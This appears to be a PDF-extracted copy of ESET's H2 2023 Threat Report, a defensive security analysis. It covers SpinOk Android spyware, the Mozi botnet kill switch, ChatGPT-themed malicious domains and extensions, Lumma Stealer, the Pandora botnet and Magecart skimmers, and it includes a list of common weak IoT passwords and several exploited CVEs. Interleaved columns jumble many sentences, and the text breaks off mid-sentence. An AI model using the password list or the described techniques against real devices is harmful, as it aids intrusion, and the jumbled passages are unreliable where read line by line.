Threat

Report
H2 2023
June 2023 – November 2023

(eset):research
ESET THREAT REPORT H2 2023 | 2

Contents
Foreword4
Threat landscape trends 5
SpinOk spinning the definition of Android spyware6
Who killed Mozi?9
Abusing the ChatGPT name for malicious domains12
Lumma Stealer takes the cryptostealer threat landscape by storm14
Android TV boxes under fire: Pandora builds a botnet for DDoS attacks16
Magecart, the ever-present phantom haunting e-commerce 18
Website visitors under siege by malicious scripts21
Cl0p and its MOVEit hack: A mass-spreading yet targeted attack23

Threat telemetry26
Research publications39
About this report41
About ESET42
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 3

Executive summary
Android IoT Android Botnets
SpinOk spinning the definition of Android spyware Android TV boxes under fire: Pandora builds a botnet for DDoS attacks
SDK or spyware? A significant number of legitimate Android apps started to behave as A new Mirai-based threat uses malicious streaming apps to enslave devices in Latin America.
spyware; the reason is a third-party software development kit.

IoT Botnets Infostealers Web threats

Who killed Mozi? Magecart, the ever-present phantom haunting e-commerce
ESET researchers discovered and analyzed a kill switch that had taken down one of the most It seems there is never a prolonged period without notable Magecart attacks and H2 2023
prolific IoT botnets. was no exception.

Web threats AI Web threats

Abusing the ChatGPT name for malicious domains Website visitors under siege by malicious scripts
A new economy has arisen around OpenAI API keys and the ChatGPT name, luring legitimate The rise in JS/Agent detections reveals that almost 45,000 websites have fallen victim to
participants and cybercriminals alike. malicious JavaScript code.

Cryptocurrency threats Infostealers Malware-as-a-Service Ransomware

Lumma Stealer takes the cryptostealer threat landscape by storm Cl0p and its MOVEit hack: A mass-spreading yet targeted attack
Illicit cryptomining may be on its way out, but Lumma Stealer’s success shows that How exploitation of a two-year-old zero day by one actor caused a global cybersecurity
cryptowallets remain in the sights of cybercriminals. nightmare.
 Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 4

Foreword
Welcome to the H2 2023 issue of the ESET Threat Report!

The second half of 2023 witnessed significant cybersecurity enforcement. A new threat, Android/Pandora, surfaced in the Similarly, Magecart, a threat that goes after credit card data,
incidents. Cl0p, a notorious cybercriminal group known for same landscape, compromising Android devices – including has continued to grow for two years by targeting myriads of
carrying out ransomware attacks on a major scale, garnered smart TVs, TV boxes, and mobile devices – and utilizing them unpatched websites. In all three of these cases, the attacks could
attention through its extensive “MOVEit hack”, which surprisingly for DDoS attacks. have been prevented if developers and admins had implemented
did not involve ransomware deployment. The attack targeted appropriate security measures.
numerous organizations, including global corporations and US Amidst the prevalent discussion regarding AI-enabled attacks,
governmental agencies. A key shift in Cl0p’s strategy was its we have identified specific campaigns targeting users of Lastly, the increasing value of bitcoin has not been accompanied
move to leak stolen information to open worldwide web sites tools like ChatGPT. We also noticed a considerable number of by a corresponding increase in cryptocurrency threats, diverging
in cases where the ransom was not paid, a trend also seen attempts to access malicious domains with names resembling from past trends. However, cryptostealers have seen a notable
with the ALPHV ransomware gang. Other new strategies in “chapgpt”, seemingly in reference to the ChatGPT chatbot. increase, caused by the rise of the malware-as-a-service (MaaS)
the ransomware scene, according to the FBI, have included the Threats encountered via these domains also include web apps infostealer Lumma Stealer, which targets cryptocurrency wallets.
simultaneous deployment of multiple ransomware variants and that insecurely handle OpenAI API keys, emphasizing the These developments show an ever-evolving cybersecurity
the use of wipers following data theft and encryption. importance of protecting the privacy of your OpenAI API keys. landscape, with threat actors using a wide range of tactics.

In the IoT landscape, our researchers have made a notable We have also observed a significant increase in Android spyware I wish you an insightful read.
discovery. They have identified a kill switch that had been used cases, mainly attributed to the presence of the SpinOk spyware.
to successfully render the Mozi IoT botnet nonfunctional. It is This malicious software is distributed as a software development Jiří Kropáč
worth mentioning that the Mozi botnet is one of the largest kit and is found within various legitimate Android applications. ESET Director of Threat Detection
of its kind we have monitored over the past three years. The On a different front, one of the most recorded threats in H2 2023
nature of Mozi’s sudden downfall raises the question of whether is three-year-old malicious JavaScript code detected as ​JS/Agent,
the kill switch was used by the botnet creators or Chinese law which continues to be loaded by compromised websites.
 Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 5

Threat
landscape
trends
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 6

Android

SpinOk spinning the definition of Android

spyware
SDK or spyware? A significant number of legitimate Android apps started to behave as
spyware; the reason is a third-party software development kit.

During the second half of 2023, ESET telemetry reported named OKSpin. SDKs can be integrated into mobile
a significant surge in Android Spyware detections, apps to aid developers and marketers in collecting user
rising by 89%. This increase was primarily due to a data, analyzing user behavior, delivering personalized
mobile marketing software development kit (SDK), content, and executing other marketing strategies. In
identified as SpinOk Spyware by ESET. Surprisingly, this instance, the OKSpin SDK offered app developers
this SDK was incorporated into numerous legitimate a gaming platform intended to monetize app traffic.
Android applications, including many available Developers could embed it into a wide variety of
on official app marketplaces. As a result, SpinOk apps and games, including those on official Android
Spyware climbed to seventh place in the Top 10 Android marketplaces. However, once an app with that OKSpin
detections for H2 2023, becoming the most prevalent SDK is installed, it operates like spyware, connecting to
type of Spyware for the period – almost a third of a command-and-control server and extracting a range
all Spyware detections seen by ESET telemetry of data from the device, including potentially sensitive
consisted of SpinOk. clipboard contents.

Apps in which ESET and other cybersecurity vendors SpinOk also identifies emulated environments: it
detect the SpinOk spyware contain a specific version does so by analyzing data collected from the device’s
of a mobile marketing SDK provided by a company gyroscope and magnetometer. If it determines that it is Android/SpinOK detection trend in H2 2023, seven-day moving average
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 7

any contact details on its website, but we were able store may not be able to discern whether the app
to find it registered in Hong Kong. Its given address is contains malware or potentially unwanted elements.
shared by a multitude of other companies, all claiming In such scenarios, a cybersecurity app is a valuable
to occupy the same room within the same office tool for detecting potential threats. Furthermore, this
building in Hong Kong. This suggests that OKSpin case serves as a cautionary tale for app developers,
operates as a letterbox company and its address is underscoring the risks associated with hasty and
used only for receiving mail and creating a semblance uninformed integration of third-party technology,
of physical presence in Hong Kong, while the actual which can disrupt their revenue stream and
business operations may be conducted elsewhere. potentially lead to complications with their standing
Adding to the intrigue, in the Offshore Leaks report, on official app stores.
which exposed international tax fraud, there is a
The described surge of detections in the Spyware
company registered in a room adjacent to OKSpin’s
category, driven by SpinOk, stood out against the
claimed location.
backdrop of a general decline in the detection of
A representative from an app that used the SDK other Android threats, and is responsible for the
provided by OKSpin shared their experience, shedding overall rise of Android detections in H2 2023 by 22%.
light on how the SDK found its way into numerous Adware, a constant threat in the Android environment,
applications. According to the representative, their contributed to 36% of total detections in H2. This
initial contact with OKSpin was through a business enduring prevalence of Adware can be traced to the
development agent who proposed a “revenue growth pervasive use of free mobile games, which are often
program”. The app developer confessed to failing to laden with intrusive ads. Clickers exhibited a significant
Examples of various apps containing the SDK that behaves as spyware
conduct thorough due diligence: they did not properly upward trend, with an increase of 63% in detections.
in a virtualized environment, it changes its behavior to devices worldwide. After Doctor Web’s findings were assess the third-party SDK before incorporating it The rise in Clickers can also be linked to the growing
avoid detection by sandboxes and researchers. published, OKSpin updated its module. into their app, which led to their legitimate app being distribution of apps loaded with ads, a strategy
Cybersecurity company Doctor Web identified 101 The question remains, how did an SDK behaving as removed from Google Play. Following the removal proving to be lucrative for cybercriminals. Nonetheless,
apps containing the SpinOk Spyware on Google Play, spyware find its way into so many apps, installed over of the SDK, they then had to navigate a protracted HiddenApps remained the most widespread Android
and although all of them were taken down from 421 million times? Despite its significant presence in process to have their app reinstated on the platform. detection, even though there was a small decline of 3% in
this platform, ESET telemetry continued to detect a the mobile marketing sphere, OKSpin maintains a low- their detection rate. The only other category that recorded
The case of SpinOk highlights a prevalent issue where
significant number of such apps installed on Android profile online presence. The company does not offer an increase in detections was Stalkerware, by 5%.
a typical user downloading an app from an official
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 8

Adware, Clickers, and HiddenApps represent distinct Android detection

types, each exploiting advertisements in unique ways. Adware primarily
functions by displaying unsolicited ads on a user’s device. In contrast, EXPERT COMMENT
HiddenApps cleverly conceal themselves on a device post installation and
The SpinOk case serves as a reminder for app developers network traffic to spot any unexpected data transfers.
can execute various malicious – or at least unwanted – activities, including
about the need for caution when deciding to incorporate They can also scan their own apps with reputable security
the display of intrusive ads. Clickers, on the other hand, are designed
to fraudulently generate ad revenue through automated ad-clicking,
third-party technology into their apps. It’s common for products after a test integration with the third-party SDK
unbeknownst to the user. This differentiation explains the distinction developers to be approached by third-party tech providers, under consideration. It’s advantageous to verify whether the
between Hiddad trojan and Hiddad PUA, both listed in the Top 10 Android but it’s crucial to evaluate these technologies thoroughly to SDK or its provider has any security certifications or audits,
detections in H2 2023. While Hiddad trojan falls under the HiddenApps ensure that they are secure and suitable for their apps. and feedback from developer forums or groups should be
category, Hiddad PUA is classified as a potentially unwanted application considered. Prior to integrating an SDK into apps, we advise
(PUA). Despite their similarities, these two detections exhibit slightly
Ensuring the security of an SDK involves a series of
developers to conduct a test in a safe environment to assess
different behaviors on Android devices. steps, starting with a comprehensive investigation of the
its behavior and performance. Remember, integrating an
provider’s reliability. This involves understanding the SDK’s
Financial threats, which encompass Banking malware and Cryptostealers, SDK into your app gives it access to all of your app’s data, so
recorded a 14% decrease, thus continuing their downward trajectory from
functionality, examining its documentation, and, if feasible,
if resources for such evaluations are lacking, it’s best to avoid
H1 2023. The second half of 2023 also saw a considerable decrease in scrutinizing the source code for any anomalies. Developers
using third-party SDKs.
detections of SMS threats (23%), Ransomware (22%), Cryptominers (10%), should utilize static analysis tools to unearth unwanted
and ScamApps (9%). behavior and potential vulnerabilities, and keep an eye on Lukáš Štefanko, ESET Senior Malware Researcher
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 9

IoT Botnets

Who killed Mozi?

ESET researchers discovered and analyzed a kill switch that had taken down one of the most
prolific IoT botnets.

For over two years, we’ve been writing in ESET Threat routers (CVE-2018-10562), D-Link routers (CVE-2015-
Reports about the Mozi IoT botnet, reporting mostly 2051), and Jaws web servers (EDB-41471), but its
on its gradual descent on autopilot. In August 2023, spreading powers eroded over time. Between January
the botnet experienced an unanticipated nosedive and April 2022, the botnet added almost 500,000
in activity. First, it vanished from the radar in India new and unique minions, mostly from China and India.
(on August 8, 2023) and then a week later in China In the following four months that number already
(August 16) – countries that hosted the lion’s share of dropped to 383,000 and in the last third of 2022, it slid
the enslaved devices. Our deeper analysis showed that again to just 289,000 new bots.
this was a deliberate takedown that could have been
This trend could theoretically continue until Mozi
done by only two entities.
couldn’t find any more devices to compromise. But it’s
The originators of the Mozi botnet were apprehended downfall came much faster. In August 2023, Mozi bots
by Chinese law enforcement in July 2021. Since then, unexpectedly stopped propagating and the number of
the botnet continued exploiting vulnerabilities and unique IPs seen within our honeypots had nosedived
infesting hundreds of thousands of new IoT devices by 89% within a few days.
each year but, unsurprisingly, there was no apparent
Our investigation into the sudden collapse led us to
use of the aggregated network and no updates to the
the discovery of a control payload (a configuration file)
Mozi bot code being propagated across it.
that worked as a kill switch. Upon delivery, it stopped
Mozi mostly compromises vulnerable Netgear DGN all attempts to propagate the malware further and
devices (EDB-25978), DASAN Networks GPON home stripped Mozi bots of most of their functionality.
Code snippets of the original Mozi sample (left) vs kill switch sample seen in 2023 (right)
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 10

Mozi timeline
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 11

ESET researchers first spotted the kill switch inside a user remote server, probably for statistical purposes. Both
datagram protocol (UDP) message, which was missing these actions indicate that Mozi’s sudden demise
the typical encapsulation of BitTorrent’s distributed was in fact a deliberate and calculated takedown. EXPERT COMMENT
sloppy hash table (BT-DHT) protocol. The person behind Upon closer inspection, the kill switch shows a strong In recent years, IoT malware has slipped to the periphery of concern given its difficult
the takedown sent the control payload eight times connection to the botnet’s original source code and use detection, monitoring, and often unattainable mitigation. Still, threats like Mirai and its
to each available bot, always instructing the device to of correct private keys to sign the binaries. offspring represent a significant risk, as smart devices can easily be exploited to create large
download and install an update of itself via HTTP. DDoS networks, anonymization networks, or be used for targeted tracking of VIP users.
Based on these facts, we hypothesize about two
The control payload also demonstrated several other potential actors, who could stand behind the castration
Adequate security measures and standards for IoT protection are available, but not all
functions such as killing the parent process and of the botnet: the original botnet creators, or Chinese
manufacturers are willing to implement them – be the reason the costs, negligence, or
replacing the original Mozi file with itself, disabling law enforcement forcing the cooperation of the creators.
anything else. Also, one cannot expect end users to be the force of change, because they
system services such as sshd and Dropbear, executing
The demise of one of the most prolific IoT botnets are mostly indifferent to whether their router or security camera recorder is conducting
router/device configuration commands and disabling
provided a wealth of cyberforensic and technical some illicit activity, since it doesn't affect their experience.
access to a specific set of ports.
information on how such botnets are created, operated,
Despite the drastic reduction in functionality, Mozi and dismantled. In the coming months, ESET researchers
Meanwhile, attackers keep pace with vulnerabilities, exploiting an ever-growing number
bots have maintained persistence. They also pinged a will publish a detailed analysis on WeLiveSecurity.com.
of weaknesses and types of devices and all that with alarming proficiency. The significance
of honeypots in monitoring such actions is therefore crucial, having been instrumental in
observing occurrences like the shutdown of Mozi. Ultimately, understanding and addressing
these and all the emerging potential cyberthreats will be critical to help increase the digital
security of the future internet.

Milan Fránik, ESET malware researcher

Sudden drop in Mozi activity globally in H2 2023, seven-day moving average

ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 12

Web threats AI

Abusing the ChatGPT name for malicious

domains
A new economy has arisen around OpenAI API keys and the ChatGPT name, luring legitimate
participants and cybercriminals alike.

ESET telemetry in H2 2023 recorded blocking over an api.openai.com endpoint. OpenAI then bills each
650,000 attempts to access malicious domains API key user according to the number of tokens used.

whose names include the string chapgpt or similar Protecting the privacy of your API key is thus critical
text in apparent reference to the ChatGPT chatbot. to ensuring that your API use stays within budget.
While most blocks happened in June, the succeeding However, some developers have built bring-your-own-
key apps that request your OpenAI API key, purportedly
months saw website visitors encountering a steady
to make calls to api.openai.com on your behalf. If
stream of malicious domains superficially offering
the app sends your key to the developer’s server, there
OpenAI services.
may be little to no guarantee that your key will not be
Threats encountered via these domains include web apps leaked or misused, even if the call to the OpenAI API
that insecurely handle OpenAI API keys, and malicious is also made. This is why OpenAI strongly exhorts:
Google Chrome browser extensions for ChatGPT. “Remember that your API key is a secret! Do not
share it with others or expose it in any client-side code
OpenAI offers an API that grants access to AI models
(browsers, apps).”
trained by OpenAI, such as GPT, DALL·E, and Whisper.
In one case, we noticed that a ChatGPT web app on
Using the API requires obtaining a key from OpenAI
chat.apple000[.]top asks users for their OpenAI API
and sending it in an HTTP Authoirzation header to Detections of malicious ChatGPT-inspired domain names and JS/Chromex.Agent.BZ in H2 2023
keys and sends them to its own server.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 13

This web app links to the open-source code in GitHub from which
it was built. A Censys query for HTML web pages that use the title
“ChatGPT Next Web” suggests that over 7,000 servers host a copy of this
EXPERT COMMENT
web app. Whether these copies were created as a part of campaigns Deleting malicious browser extensions may not be
phishing for OpenAI API keys or were exposed on the internet for
enough to prevent attempts at re-compromise if you
another reason cannot be determined with certainty; however, we
have turned on sync in your browser. Whenever the sync
strongly discourage entering your OpenAI API key into any app that
process runs, it attempts to make browser data – such as
sends it to an untrusted server.
extensions – from other devices available in the browser
Apart from such web apps, almost all blocks of malicious ChatGPT-
on your current device. Make sure to delete malicious
inspired domain names in the second half of 2023 were related to
browser extensions on all your devices, especially if you
Chrome extensions detected as JS/Chromex.Agent.BZ – a detection first
seen in June.
have enabled sync. Even better is to carefully vet browser
extensions before installing them and to use a reliable,
For example, we saw gptforchrome[.]com leading to the malicious
multilayered security solution that can detect them.
extension ChatGPT for Search - Support GPT-4 in the Chrome Web Store,

ChatGPT for Search Chrome browser extension detected as JS/Chromex.Agent.BZ which we have reported to Google. In June, a developer also reported that Jiří Kropáč, ESET Director of Threat Detection
this extension was potentially malicious.

This Chrome extension uses an extension service worker to import

JavaScript from a file called tracker.js, which periodically sends the
following information to the gptforchrome[.]com server:

• extension ID,

• extension version,

• unique user ID assigned by the extension, and

• current timestamp.

If the server sends a URL in response, the extension can display it in a new
browser tab. This functionality, undisclosed by the developer, could be a
A ChatGPT web app that sends OpenAI API keys to its own server conduit to malicious web pages.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 14

Cryptocurrency threats Infostealers Malware-as-a-service

Lumma Stealer takes

Win/Spy.Agent trojan 78.9%

Win/PSW.Delf trojan 8.0%

MSIL/ClipBanker trojan 6.8%

the cryptostealer
Win/PSW.Agent trojan 3.7%

MSIL/PSW.CoinStealer trojan 2.1%

PowerShell/PSW.CoinStealer trojan 0.4%

threat landscape by
Python/PSW.CoinStealer trojan 0.1%

JS/CoinThief trojan 0.02%

Win/Spy.CoinBit trojan 0.02%

storm
JS/ExtenBro.CryptoSteal trojan 0.01%

Top 10 cryptostealer families in H2 2023 (% of Cryptostealer detections)

Illicit cryptomining may be on its way out, but Lumma Stealer’s success shows that
cryptowallets remain in the sights of cybercriminals. H1 H2
+199%
H2 2023 continued the phenomenon described in the for almost 80% of detections in this category – the
previous Threat Report: the exchange rate of bitcoin Win/Spy.Agent.PRG trojan.
kept going up, yet cryptocurrency threats failed to
By matching the samples registered in ESET telemetry
match this trend. However, while cryptominers –
data and the samples found on VirusTotal, we
which make up the majority of cryptocurrency threats
determined that Win/Spy.Agent.PRG is a malware-
detected by ESET – experienced yet another steep
as-a-service (MaaS) infostealer called Lumma Stealer.
decline (down by 21%), cryptostealers were on the
Also known as LummaC2 Stealer, this malware is
rise. In H2 2023, these threats grew by more than
written in C and targets cryptocurrency wallets, user
68%. Thankfully, we cannot speak of a cryptostealing
credentials, and two-factor authentication browser
renaissance just yet, as this sudden increase was
extensions. It also exfiltrates information from
caused by just one specific threat, which accounted Lumma Stealer detection trend in H1 and H2 2023, seven-day moving average
compromised machines. Between H1 and H2 2023, the
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 15

number of Lumma Stealer detections tripled. We registered the highest rate fake browser update campaign, in which a compromised website is made CRYPTOCURRENCY HEISTS AND SCAMS
of Win/Spy.Agent.PRG detections in the latter half of H2, peaking in October. to display an overlay telling the victim that a browser update is necessary
Malware that targets cryptocurrencies may not be as common as before,
to access the site. Clicking the update button then delivers malware such as
This up-and-coming MaaS first appeared in the wild in August 2022 and is but H2 2023 saw no lack of high-profile cryptocurrency-related cybercrime.
RedLine, Amadey, or the titular Lumma Stealer to the victim’s machine.
available for sale on underground forums and on Telegram. Multiple tiers
Cryptoscammers posing as NFT developers
are offered, with prices ranging from USD 250 up to USD 20,000; At ESET, we have also seen Lumma Stealer being distributed by the
the highest tier even gives buyers access to the infostealer’s source code Win/TrojanDownloader.Rugmi trojan. This malware is a loader with three The FBI issued a warning about criminals posing as legitimate NFT developers
and allows them to sell the malware themselves. types of components: a downloader that downloads an encrypted payload, in order to steal the cryptocurrency funds of their victims. These scammers
a loader that runs the payload from internal resources, and another make posts claiming to offer limited NFT opportunities that lead to spoofed
Interestingly, there are ESET detections of Win/Spy.Agent.PRG from before
loader that runs the payload from an external file on the disk. Apart from websites. Once victims try to make purchases via the website, the threat
2022. Based on the information shared on X (formerly Twitter) by the
Lumma Stealer, Win/TrojanDownloader.Rugmi is also used to deliver actors can steal the funds contained within their cryptocurrency wallets.
cybersecurity company Sekoia.io and the user Fumik0_, we conclude that
other infostealers, among them Vidar, Rescoms, and RecordBreaker. The Lazarus linked to theft of roughly USD 900 million in cryptocurrency
the detections prior to 2022 belong to Mars, Arkei, and Vidar infostealers,
detections of this loader skyrocketed in H2, going from single digit daily
whose common code base was later repurposed to create Lumma Stealer. Between July 2022 and July 2023, the Lazarus APT group laundered around
numbers to hundreds per day.
Being available for sale and not focusing purely on cryptostealing are USD 900 million in cryptocurrency through cross-chain crime: when
very likely the main factors behind Lumma Stealer’s popularity among criminals convert cryptocurrency assets from one token or blockchain to
cybercriminals. As we discussed in the RedLine Stealer section of the H1 another, often in quick succession, to obfuscate the assets’ origin.
2023 ESET Threat Report, ready-made malware solutions contribute to Elon Musk cryptocurrency scams find a new platform
the proliferation of malicious campaigns because they make the malware
Scams posing as cryptocurrency giveaways by Elon Musk have for some
available even to potentially less technically skilled threat actors. Offering a
time been quite notorious on X and Instagram. Now, they are finding a new
broader range of functions then serves to render Lumma Stealer even more
audience on the video-sharing platform TikTok, using deep fakes of Musk
attractive as a product.
interviews. In order to receive the advertised reward, users are asked to
Although this infostealer spreads mainly through cracked installations make activation deposits into scam sites, which then steal the payments.
of software such as VLC and ChatGPT, it has been seen utilizing other
USD 4.4 million in cryptocurrency stolen due to LastPass breach
distribution vectors as well. For example, in February 2023, a Korean
YouTuber was targeted via a spearphishing email impersonating the video In October, hackers used private keys and passphrases from leaked
game company Bandai Namco. Threat actors have also been spreading it LastPass databases to steal USD 4.4 million in cryptocurrency. LastPass
via the content delivery network of the popular chat platform Discord. was breached twice in 2022, giving threat actors access to the company’s
Furthermore, Lumma Stealer is one of the possible payloads of a recent Win/TrojanDownloader.Rugmi detection trend in H2 2023, seven-day moving average customer data.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 16

IoT Android Botnets

Android TV boxes under fire: Pandora builds

a botnet for DDoS attacks
A new Mirai-based threat uses malicious streaming apps to enslave devices in Latin America.

Any device connected to the internet could become followed by Mexico (13%) and Peru (11%).
a target for cybercriminals. Smart TVs with their There are two possible delivery methods for the
peripherals are no exception. In September 2023, a Android/Pandora malware. First is via malicious
new IoT botnet sprang to life, which ESET detects firmware updates that were preinstalled on the
as Android/Pandora. First described by Doctor Web, Android TV box by the reseller or downloaded and
the threat compromises Android devices – most installed by an unaware victim.
prominently Android TV boxes – with Mirai-based
However, the main distribution channel seems to be
malware. The enslaved devices are then used by the
websites spreading malicious apps with names such as
botnet operators to run DDoS attacks.
MagisTV, Tele Latino, and YouCine. These are offered
According to ESET telemetry, Android/Pandora not only for TVs, smartphones, tablets and Android TV
attempted to compromise tens of thousands of boxes, but also for TV sticks from Amazon and Xiaomi.
Android/Pandora detection trend from September 2023 to November 2023
Android devices, with approximately a fifth of instances
Upon installation, these apps offer streaming services
detected and blocked directly on victims’ television sets
and pirated content that can be accessed for free,
by ESET Smart TV Security.
on trial, or with a premium account. From the user’s ANDROID TV BOX
The biggest spike of activity was observed on perspective, the app provides all the promised features
September 8, with over two thousand attacks. After and content without any obvious signs of malicious
It’s an IoT peripheral device – typically a box or a dongle – that users plug into their TV to gain access
the initial wave, the activity dropped to about five activity. Moreover, paying for the premium subscription to a variety of streaming apps, or content, that is not natively supported by their television set.
hundred attacks daily. The most targeted region is lowers the willingness of a victim to voluntarily remove
Latin America, with Brazil leading the pack (20%), the malware from the device.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 17

Somewhat counterintuitively, the number of servers delivering modified 0.6% 0.6% 0.4%
0.7%
Mirai payloads for these botnets dropped by only 3% – just a few dozen
machines – and the Mirai-based IoT armies have grown by 58% from
2%1%1% admin
106,000 to over 168,000 between the first and second halves of 2023. 3%
root
The largest share of that increase came from Egypt, which hosted close 13% 1234

to 110,000 (65%) of all the detected compromised devices – a 164% jump password
guest
compared to 42,000 (39%) seen in the first half of 2023. Looking at the
12345
other side of that equation, the greatest percentage of unique devices
support
facing Mirai-based bot attacks were in Germany (16%), the US (9%), and x-admin
Mexico (7%). 75% Admin
super
Mirai-based botnets have refreshed the list of exploited flaws in H2 2023
by adding CVE-2023-26801: this recently reported command injection
vulnerability in several LB-LINK routers was the second most abused in the
last six months and accounted for 10% of all detected attack attempts.
User interface of the malicious apps Top 10 most common weak IoT device passwords in 2023

Although the list of app permissions doesn’t seem to be intrusive or to

hint at spyware functionality, if installed on a Smart TV, Pandora requests
superuser or root rights for the application. For this to work, however, the
device already needs to be rooted at the point of installation; the app does
not try to root the device itself.

(Other) Mirai-based botnets

While the Pandora botnet was on the rise, other Mirai-based botnets
tracked by ESET – including Gafgyt, BotenaGo, Dofloo, Tsunami, Zero, and
others – seemed to lose steam. According to our telemetry, these networks
of enslaved IoT devices caused “only” 7.5 million attacks in H2 2023, a notable
59% decrease compared to H1 2023. The highest number of those attacks
Pandora request for superuser (root) rights on an Android Smart TV
were directed at the US (22%), Germany (7%), and the United Kingdom (7%).
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 18

Infostealers Web threats

Magecart, the ever-present phantom

haunting e-commerce
It seems there is never a prolonged period without notable Magecart attacks and H2 2023
was no exception.

Magecart has been successfully targeting online This malware family consistently ranks in the top

H1 H2
shopping and hospitality platforms since 2015 and positions in our most-detected Infostealer statistics.
shows no signs of stopping. On the contrary, based In H2 2023, it was in second place, with detections
on ESET data, H2 2023 marks the second year of counting in tens of thousands, the only threat with
+9%
continuous growth for this malware. But what makes more detected activity being Agent Tesla. Still, it should
Magecart such a pervasive threat? be mentioned that since JS/Spy.Banker detections are
based on the number of unique visits to a website,
In ESET telemetry, Magecart detections fall under
it will have a generally higher number of detections
JS/Spy.Banker, which is categorized as a web skimmer
than threats distributed as email attachments or
– i.e., a malicious online script injected into the code of
downloader payloads.
hacked or unpatched websites with the goal of stealing
information from those who browse these websites. Nevertheless, there is little doubt that Magecart is a
Magecart mostly goes after credit card data and very prolific threat. Looking at our data, JS/Spy.Banker
targets websites hosted on Magento and WordPress has been growing in numbers since the end of 2021 –
platforms. There is no single threat actor behind the overall increase of its detections between 2021 and
Magecart attacks; ESET tracks under the one label the 2023 amounts to 343%. Zooming in on H2 2023, we
activity of the several groups that use Magecart. can see that while the malware family did not grow JS/Spy.Banker detection trend in H1 and H2 2023, seven-day moving average
dramatically this period (+9%), there was still an uptick
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 19

in detections starting in October and accelerating would make this type of malware accessible to a
throughout November. Since the end of the year is broader range of cybercriminal actors.
also the time when people generally do a lot more
Apart from the obvious impact on the customers of
online shopping due to the approaching holiday season,
a compromised website whose money and personal
it comes as no surprise that Magecart rates would
information gets into the hands of cybercriminals,
increase as well.
Magecart attacks can be quite devastating to the
While Magecart attacks are not the most flashy or targeted companies. Due to the loss of confidence
sophisticated forms of cybercrime out there, they have of their clients, these businesses face monetary
been successfully used by cybercriminals for years. consequences, since fewer customers equals less
Their simplicity works in their favor, using scripts revenue. There can also be legal ramifications:
that are relatively straightforward to code, while the for example, in the EU, these companies can find
myriads of unpatched websites make for easy prey. It themselves in violation of GDPR due to data leaks,
also seems that the ongoing AI boom might be a boon which can lead to significant fines. In a recent report,
to Magecart: researchers have shown that ChatGPT IBM estimated that the average cost of a data breach
can be abused to write web-skimming scripts, which in 2023 was USD 4.45 million.

Website compromised by JS/Spy.Banker and the malicious code linked to the page
MSIL/Spy.AgentTesla trojan 14.7%

JS/Spy.Banker trojan 13.7% It is, however, very much possible to protect a compromising e-commerce websites. This is another

PHP/Webshell backdoor 6.1% business against Magecart skimmers. If you want to reason why Magecart is, at least for now, here to stay
prevent your website from being compromised, we – it does not remain stagnant.
Win/Formbook trojan 5.9%

MSIL/Spy.Agent trojan 3.0% recommend that you make sure that your website Analysts at Akamai published two research pieces
servers and CMS are running up-to-date software, on these more sophisticated attacks. One of them
ASP/Webshell backdoor 2.4%
describes how cybercriminals leverage legitimate
PHP/Agent backdoor 2.0% and that the accounts administering those resources
websites to attack others. First, they inject Magecart
Win/HoudRat trojan 1.8% are protected by strong authentication mechanisms
code into a vulnerable site, using it to host the code,
Win/Korplug backdoor 1.7% (i.e., using strong passwords and two-factor
then they attack their actual target by employing
Win/Spy.Agent trojan 1.7% authentication).
malicious JavaScript code snippets as loaders that
In H2 2023, there have also been some notable get the full code from the previously compromised
Top 10 infostealer families in H2 2023 (% of Infostealer detections)
evolutions in the threat actors’ approach towards vulnerable website.
ESET THREAT REPORT Executive summary Foreword Threat landscape trends Threat telemetry Research publications About this report About ESET H2 2023 | 20

We have also been encountering scripts that function TeslaCrypt ransomware used to hide C&C commands
OTHER INFOSTEALER INSIGHTS Qbot operations disrupted
similarly to the ones described in the linked article – in HTML tags. Luckily, Magecart scripts are usually
macOS password stealers on the rise In August 2023, the notorious Qbot malware (also
if a skimmer is not located directly on the targeted easily recognized by cybersecurity products even
known as Qakbot) was taken down thanks to a
website, ESET products usually detect the script leading though the threat actors try to hide them in creative The macOS platform is generally targeted by
coordinated international operation conducted by
to it. These scripts often belong to the JS/Redirector or ways: in case of an encounter with a compromised adware and Potentially Unwanted Applications
several national law enforcement agencies, and
JS/Agent families. site, it would be detected and blocked by the ESET (PUAs); however, ESET telemetry has detected a
organizations such as Europol and the FBI. In the
detection engine. worrying trend in H2 2023, where Password Stealing
The other research piece talks about hiding Magecart process, the authorities seized nearly EUR 8 million
Ware (PSW) on macOS experienced a staggering
scripts in 404 error pages: once a victim wants to pay Magecart attacks are the most prevalent in the US, in cryptocurrencies. The examination of Qbot
290% increase. PSWs, which are just one subset of
for the goods they’re buying, a malicious piece of code which registered almost 15% of JS/Spy.Banker attack infrastructure revealed over 700,000 compromised
infostealers detected on the macOS platform by ESET,
calls the 404 page with the skimmer script, which then attempts. This threat is actually the most detected computers worldwide.
are a type of malware designed to steal sensitive
overlays a lookalike payment form on the checkout infostealer in the United States, accounting for a third
data from users’ systems. Working quietly in the Looking at ESET telemetry data, the malware was
